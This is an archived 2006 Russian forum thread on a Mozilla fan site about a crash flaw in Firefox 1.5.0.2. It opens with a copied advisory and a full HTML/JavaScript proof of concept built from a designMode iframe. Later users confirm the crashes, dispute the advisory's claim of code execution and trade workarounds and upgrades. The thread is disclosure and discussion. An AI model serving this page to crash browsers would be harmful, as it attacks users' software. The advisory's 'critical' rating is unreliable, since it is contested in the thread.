>Форум Mozilla Россия
   http://forum.mozilla-russia.org/index.php
>Флейм
   http://forum.mozilla-russia.org/viewforum.php?id=14
>Переполнение буфера в Mozilla Firefox
   http://forum.mozilla-russia.org/viewtopic.php?id=9882

apocalypse_2010 > 25-04-2006 12:30:33

25 апреля, 2006
Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
  <script>
       var textarea = document.getElementsByName("x_OtherInfo");
       textarea=textarea.item(0);
           var htmlarea = document.createElement("div");
       htmlarea.className = "htmlarea"; 
       textarea.parentNode.insertBefore(htmlarea, textarea);
       var iframe = document.createElement("iframe");
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document;
                 doc.designMode = "on";
                 doc.open();
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus()
  doc.close();
  </script>
</textarea>

Решение: Способов устранения уязвимости не существует в настоящее время.

TLemur > 25-04-2006 16:16:32

Скопировал. Кликнул по полю ввода. Firefox 1.5.0.2 вывалился.
Временное решение: Запретить выполнение JavaScript с помощью, например, NoScript.

Xeningem > 25-04-2006 17:32:02

Люди... Извините, сам проверить не могу, но судя по LOR (http://www.linux.org.ru/view-message.jsp?msgid=1367875&page=0) - поддвержены именно 1.5.0.2 версии...

Sniper_gf > 25-04-2006 18:02:59

Да, действительно, ФФ вылетает

stoneflash > 25-04-2006 19:39:28

Ага. Результат аналогичен. Прыгать на версию назад, что ли?

krigstask > 25-04-2006 20:12:21

Ага. Результат аналогичен. Прыгать на версию назад, что ли?

Получишь 21 критическую уязвимость (-;Е

stoneflash > 25-04-2006 20:52:23

krigstask
Млин, меж двух огней. Выбераю наименьшее  зло.

Почесал > 25-04-2006 22:01:17

Ага. Результат аналогичен. Прыгать на версию назад, что ли?

Тебе это так жить мешает?

stoneflash > 25-04-2006 22:04:33

Почесал
Сейчас вообще по барабану. Мало ли - стукнет.

Unghost > 26-04-2006 00:12:54

Если эта уязвимость то же самое, что описано на http://secunia.com/advisories/19802/ (что и есть, судя тому что пути к "эксплоиту" совпадают) - то эта уязвимость не позволяет выполнить   "произвольный код на целевой системе", а является банальным кодом валящим браузер.
Опасность - 1 из 5, ничего интересного.

Unghost > 26-04-2006 00:16:57

Кому интересно, могут прочесть http://forums.mozillazine.org/viewtopic.php?t=408603

Tearis > 26-04-2006 00:33:10

Unghost
А оно так и есть. Обычное переполнение буфера, ничего нового.

INFOMAN > 26-04-2006 02:14:50

:::: Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.8.0.2) Gecko/20060405 SeaMonkey/1.0.1 тоже падает

apocalypse_2010 > 26-04-2006 11:26:24

КСТАТЕ вот источник откуда я это скопировал http://www.securitylab.ru/vulnerability/266229.php  ОЧЕНЬ ХОРОШИЙ САЙТ!

Tearis > 26-04-2006 15:33:37

Решение: Способов устранения уязвимости не существует в настоящее время.

Существует, поставить v2.0a1, например.

:::: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1 - не падает.

Zmeys > 26-04-2006 23:33:37

Tearis
поставить v2.0a1, например.

Начиная с 25-го в nightly/latest 1.5.0.2 поехали локализации (включая и mar-файлы), на сегодня уже почти полный набор. Русская, к примеру, проявилась - 25-Apr-2006 19:53. Мне просто некогда качать и проверять (сам на .0.3-й), ежели кого плющит по безопасности - попробуйте.